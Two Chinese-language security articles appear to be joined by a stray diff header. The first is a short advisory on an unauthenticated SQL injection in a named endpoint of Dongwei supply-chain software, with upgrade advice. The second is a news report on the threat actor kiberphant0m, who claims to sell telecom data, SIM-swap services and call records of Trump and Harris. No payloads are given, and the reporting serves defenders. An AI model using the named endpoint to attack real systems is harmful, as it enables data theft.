- 高危
**0x02 漏洞概述**
懂微科技是一家专注于办公服务行业电商解决方案的提供商,致力于为办公服务行业赋能、提升效率和核心竞争力。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/7stTqD182SVjdb8W7T5YIrddGeQMLUBTlL49QfAEw54JUb0x6Bw7xYhKSibzxCODqv68rIGNx3qib7XAWnicicpqzg/640?wx_fmt=png&from=appmsg "")
**0x03 漏洞详情**
**漏洞类型:**
SQL注入
**影响:**
敏感信息泄露****
**简述:**
懂微百择唯·供应链的/Goods/RankingGoodsList2接口存在SQL注入漏洞未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息之外甚至在高权限的情况下可以向服务器中写入木马进一步获取服务器系统权限。
**0x04 影响版本**
- 懂微百择唯·供应链
**0x05****POC状态**
- 已公开
**0x06****修复建议**
**目前官方已发布漏洞修复版本,建议用户升级到安全版本******
https://www.donvv.com/

View File

@ -0,0 +1,112 @@
# 美国Verizon、AT&T电信网络攻击案疑似内鬼kiberphant0m此人声称获取了特朗普和哈里斯的通话记录
原创 网空闲话 网空闲话plus 2024-11-27 23:39
**正当媒体热炒X台风入侵美国主要电信网络之际一个名为kiberphant0m的威胁行为者浮出水面这个被忽视威胁行为者近一段时间多次声称出售有关电信服务提供商、电信业务以及美国国家安全局的权限和数据并直接了当地声称拥有当选总统唐纳德·特朗普和副总统卡玛拉·哈里斯的通话记录。同样被美国官方指出的电信攻击受害者T-mobile公司27日正式表态不能确认攻击者是谁敏感的客户记录通话记录、短信并无被窃。**
![](https://mmbiz.qpic.cn/mmbiz_jpg/0KRmt3K30icWf6Cp2Ekrfn8RlpVAIzFXib5bmOPmOccHVYSobAWqGj2hOFASF2G7N41iacQ31YIia1jCEMjc0nOZoQ/640?wx_fmt=jpeg&from=appmsg "")
自从今年1月份出现在英语和俄语网络犯罪论坛上以来Cyble暗网研究人员一直在追踪一个名为“kiberphant0m”的威胁行为者(TA)的活动。
自8月底以来kiberphant0m一直在出售据称从Verizon和AT&T获得的数据和访问权限此外还有据称属于美国国家安全局(NSA)的“间谍模式”TA声称这些“间谍模式”来自今年早些时候的大规模Snowflake数据泄露事件。
**kiberphant0m何许人也**
Kiberphant0m于2024年1月加入BreachForums但他们在Discord和Telegram频道上的公开言论至少可以追溯到2022年初。在他们第一次发布到BreachForums的帖子中Kiberphant0m表示可以通过Telegram账号@cyb3rph4nt0m联系他们
@cyb3rph4nt0m的评论显示该用户自2024年1月以来已发布了4,200多条消息。其中许多消息都是试图招募人员这些人可以被雇来部署一种恶意软件该恶意软件可以奴役物联网 (IoT) 僵尸网络中的主机。
在3月对其他帖子做出几次回复后
Kiberphant0m于4月开始出售数据首先是加密赌场数据库。Telegram频道大约在同一时间开始运营。目前共发布帖子57条。
![](https://mmbiz.qpic.cn/mmbiz_png/0KRmt3K30icWf6Cp2Ekrfn8RlpVAIzFXibbjiaIEoBkgUYEzYYia50QuPTsEbrllxlsl3eghdW1Ly2fzIummxryUwQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/0KRmt3K30icWf6Cp2Ekrfn8RlpVAIzFXibcTJW7QEeOztvaaxCJhia0ATOavErKSTJoiaLYxCn6YneXqlU16hgQkdQ/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/0KRmt3K30icWf6Cp2Ekrfn8RlpVAIzFXibf9nN5VEvm2LqO2bDpVYD6kIYayafhibg0dAnrj4Ev57K8Sy94CzWbJg/640?wx_fmt=png&from=appmsg "")
其他活动包括销售:
访问乌克兰政府研究服务器的权限
获得国防承包商的许可
175TB应用程序泄露
获得拥有95个域名的中国服务器的根访问权限其中包括一些关键基础设施部门
英国银行服务器访问权限
印度和亚洲电信数据和访问权限
进入欧洲生物医药公司的权限
访问移动社交媒体应用程序
SSH机器人和服务器访问权限
LinuxDDoS僵尸网络源代码
最近kiberphant0m声称与UNC5537有联系UNC5537是Snowflake入侵事件背后的经济驱动威胁组织。一些帖子包含标签#FREEWAIFU指的是Alexander“Connor”Moucka的别名他最近因Snowflake入侵事件被加拿大官员逮捕并受到指控。
威胁情报研究人员认为kiberphant0m不仅仅是一个中间人他在技术方面也表现出了高超的技能。声称与UNC5537的联系是最近才出现的需要更多指标才能确定这种联系。FREEWAIFU活动可能是掩盖其他联系的幌子。其对美国电信网络入侵事件发生的时间与外国媒体炒作某台风活动时间相近这一点也值得关注。
**KrebsonSecurity于26日发布博文称kiberphant0m可能是“一名目前或曾经驻扎在韩国的美国陆军士兵”其活动可以追溯到2022年当时他使用的是其他化名。**
![](https://mmbiz.qpic.cn/mmbiz_png/0KRmt3K30icWf6Cp2Ekrfn8RlpVAIzFXibiaxZBddUgeibkyT0OfBcxQR8dibQMeWwVUWNewsNNue28hwD77SeyG6TQ/640?wx_fmt=png&from=appmsg "")
人们在一定程度上相信kiberphant0m是可靠的并且有可信的声明历史而且他们在BreachForums的声誉评分是正面的没有中性或负面的反馈。
**电信公司数据泄露**
11月5日至6日kiberphant0m在BreachForums上创建了四个主题其中三个与Verizon和AT&T相关另外三个与NSA帖子相关。
![](https://mmbiz.qpic.cn/mmbiz_png/0KRmt3K30icWf6Cp2Ekrfn8RlpVAIzFXibQLWy5qS9lqZ60LkqPVFFWYufRm9wgoLCeSo7aLT7U73VDQTUQiaribfQ/640?wx_fmt=png&from=appmsg "")
**威胁者kiberphant0m声称特朗普和哈里斯的通话记录**
特朗普和哈里斯的通话记录包括哈里斯2022年的通话样本并敦促AT&T(ATNT)与他们联系下图。另一篇帖子提供了VerizonWirelessPTT一键通日志包括SQL数据库、服务器日志和凭证可能是从第三方服务提供商处获得的。
第三篇帖子提供了VerizonWireless的SIM卡交换服务第四篇帖子似乎是据称属于NSA的Snowflake技术数据库模式下图
![](https://mmbiz.qpic.cn/mmbiz_png/0KRmt3K30icWf6Cp2Ekrfn8RlpVAIzFXibLtWaoZ7AwsdjoM7xYMv6oEY2tq8jGZ6jEkO6opyzVDxEAqH25L42GA/640?wx_fmt=png&from=appmsg "")
**VerizonWireless的SIM卡交换服务**
![](https://mmbiz.qpic.cn/mmbiz_png/0KRmt3K30icWf6Cp2Ekrfn8RlpVAIzFXibGG963IMc76ohticaQvBeg9Uiaxq8hnMYKSNENE99W6s0WicFmbWB0nsDQ/640?wx_fmt=png&from=appmsg "")
**美国国家安全局间谍计划Snowflake黑客攻击**
最近的泄密事件似乎并不涉及极其敏感的信息,但仍然令人担忧,特别是考虑到电信网络安全状况松懈。
**电信网络安全难题**
正如参议院情报委员会主席马克·沃纳(弗吉尼亚州民主党议员)上周向《华盛顿邮报》表示,美国大型电信网络是“一堆老旧网络的大杂烩……是一系列收购的组合,而且现有的设备非常老旧,无法修补”。
据推测,其中大部分都是路由器和交换机等报废设备。华纳告诉《华盛顿邮报》,网络仍然受到威胁,修复它们可能需要在全国范围内更换“成千上万台设备”。
上周五,美国国家最高安全官员与电信行业高管会面,讨论如何合作解决该问题。
**T-Mobile无法确认黑客身份敏感客户记录并未被访问**
TechCrunch最新的报道美国电话巨头T-Mobile当地时间周三27日表示在针对互联网和电话公司的持续全行业网络攻击中黑客“无法访问”其客户的通话、短信和语音邮件。
T-Mobile首席安全官Jeff Simon在一份声明中表示该公司最近几周检测到“试图入侵我们系统的行为”Simon表示这些行为源自另一家与T-Mobile网络相连的电信公司。
该公司没有透露名称。
T-Mobile周三27日表示无法明确识别黑客的身份但补充说
“目前我们没有在我们的系统中发现这些或其他攻击者。
”该公司没有明确排除其系统之前遭到入侵的可能性,称其网络安全防御阻止了攻击者“访问敏感的客户信息”。
当TechCrunch询问时T-Mobile发言人表示有关客户电话和短信的元数据例如有关呼叫者、发送者和接收者的信息以及通信日期和时间被视为“敏感”客户记录并且未被访问。
**这与美国FBI、CISA的说法完全不同**
**参考资源**
1、https://techcrunch.com/2024/11/27/t-mobile-says-telco-hackers-had-no-access-to-customer-call-and-text-message-logs/
2、https://krebsonsecurity.com/2024/11/hacker-in-snowflake-extortions-may-be-a-u-s-soldier/
3、https://thecyberexpress.com/verizon-att-hacked-by-second-threat-actor/